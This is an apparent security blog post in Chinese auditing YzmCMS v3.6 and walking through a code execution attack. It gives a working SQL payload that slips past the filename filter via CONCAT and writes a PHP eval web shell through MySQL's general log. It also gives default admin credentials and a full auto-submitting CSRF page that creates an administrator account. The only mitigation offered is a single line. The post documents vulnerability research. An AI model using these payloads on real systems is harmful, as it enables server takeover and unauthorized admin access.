【代码审计】YzmCMS_PHP_v3.6 代码执行漏洞分析

 

0x00 环境准备

YzmCMS官网:http://www.yzmcms.com/

程序源码下载:http://pan.baidu.com/s/1pKA4u99

测试网站首页:

 

0x01 代码分析

1、文件位置: /application/admin/controller/sql.class.php第10-42行中:

  1. public function init() {  
  2.     if(isset($_POST['sqlstr'])){  
  3.         if(!C('sql_execute')) showmsg('根据系统配置,不允许在线执行SQL命令!', 'stop');  
  4.         $sqlstr = MAGIC_QUOTES_GPC ? stripslashes($_POST['sqlstr']) : $_POST['sqlstr'];  
  5.         $sqlstr = rtrim(trim($sqlstr), ';');  
  6.         $sqls = $_POST['action']=='many' ? explode(';', $sqlstr) : array(0 => $sqlstr);  
  7.   
  8.         $admin = D('admin');  
  9.         foreach($sqls as $sql){  
  10. 10.             if(stristr($sql, 'outfile')){  
  11. 11.                 $str = '<span class="c-red">ERROR : 检测到非法字符 “outfile”!</span>';  
  12. 12.                 break;  
  13. 13.             }  
  14. 14.             if(stristr($sql, '.php')){  
  15. 15.                 $str = '<span class="c-red">ERROR : 检测到非法字符 “.php” !</span>';  
  16. 16.                 break;  
  17. 17.             }  
  18. 18.             if(preg_match("/^drop(.*)database/i", $sql)){  
  19. 19.                 $str = '<span class="c-red">ERROR : 不允许删除数据库!</span>';  
  20. 20.                 break;  
  21. 21.             }  
  22. 22.             $result = $admin->query($sql);   
  23. 23.             if($result){  
  24. 24.                 $str = '<span style="color:green">OK : 执行成功!</span>';  
  25. 25.                 if(is_object($result) || is_resource($result)){  
  26. 26.                     $arr = $admin->fetch_all($result);  
  27. 27.                 }                     
  28. 28.             }else{  
  29. 29.                 $str = '<span class="c-red">ERROR : 执行失败!</span>';  
  30. 30.                 break;  
  31. 31.             }                 
  32. 32.         }  
  33. 33.     }  

这段函数中对提交的sql参数进行还原处理,然后进行非法字符检测,检测字符是否存在”oufile”、”.php”,匹配是否有删除数据的操作等。

2、如何绕过这种限制?

首页,outfile被禁止,第一时间想到的就是SQL语句利用日志写入文件,但是写入脚本文件”.php”会被检测到非法字符;然后,尝试MySQL中concat函数来连接字符串,拆分’.php’关键词,如 CONCAT("test.","php");最后构造出可以写入文件,绕过非法字符检测的的SQL语句,从而触发代码执行漏洞,控制服务器。

Payload:

  1. show variables like '%general%';   #查看配置
  2. set global general_log = on;        #开启general log模式
  3. set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); 
  4. select '<?php eval($_POST[cmd]);?>';   #写入shell

0x02 漏洞利用

A、如何获取后台管理员权限

有两种思路:

思路A:通过默认信息,弱口令登录

默认后台路径:http://127.0.0.1/admin/index/login.html

管理员默认账号密码均为:yzmcms

思路B:通过CSRF漏洞,诱导管理员访问,自动在后台添加管理员账号。

CSRF漏洞利用代码如下:

  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
  2.   
  3. <html>  
  4. <head>  
  5. <title>OWASP CRSFTester Demonstration</title>  
  6. </head>  
  7. <body οnlοad="javascript:fireForms()">  
  8. <script language="JavaScript">  
  9. var pauses = new Array( "68" );  
  10. 10.   

11. function pausecomp(millis)  

12. {  

  1. 13.     var date = new Date();  
  2. 14.     var curDate = null;  
  3. 15.   
  4. 16.     do { curDate = new Date(); }  
  5. 17.     while(curDate-date < millis);  

18. }  

  1. 19.   

20. function fireForms()  

21. {  

  1. 22.     var count = 1;  
  2. 23.     var i=0;  
  3. 24.       
  4. 25.     for(i=0; i<count; i++)  
  5. 26.     {  
  6. 27.         document.forms[i].submit();  
  7. 28.           
  8. 29.         pausecomp(pauses[i]);  
  9. 30.     }  

31. }  

  1. 32.       

33. </script>  

34. <H2>OWASP CRSFTester Demonstration</H2>  

35. <form method="POST" name="form0" action="http://127.0.0.1:80/admin/admin_manage/add.html">  

36. <input type="hidden" name="adminname" value="admin"/>  

37. <input type="hidden" name="password" value="abc123!"/>  

38. <input type="hidden" name="password2" value="abc123!"/>  

39. <input type="hidden" name="email" value=""/>  

40. <input type="hidden" name="realname" value=""/>  

41. <input type="hidden" name="roleid" value="1"/>  

42. <input type="hidden" name="dosubmit" value="1"/>  

43. </form>  

44. </body>  

45. </html>  

B、代码执行漏洞利用

Payload:

  1. show variables like '%general%';   #查看配置
  2. set global general_log = on;        #开启general log模式
  3. set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); 
  4. select '<?php eval($_POST[cmd]);?>';   #写入shell

1、        执行sql语句,查看mysql日志配置情况

 

2、        根据日志文件位置或者默认站点路径来推测站点目录,可用load_file()函数来测试,确认站点目录位置。或者通过phpinfo()等信息收集获取站点目录。

 

3、        分别执行下列sql语句,将脚本代码写入文件:

set global general_log = on;         

set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); select '<?php eval($_POST[cmd]);?>';    

 

4、        提交参数,执行脚本代码:

 

5、        通过菜刀连接,获取服务器控制权限:

 

0x03 修复建议

1、Mysql数据库降权处理,让入侵者无法做高权限下可做的事!

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

 

评论将由博主筛选后显示,对所有人可见 | 还能输入1000个字符 “速评一下”
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 9.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值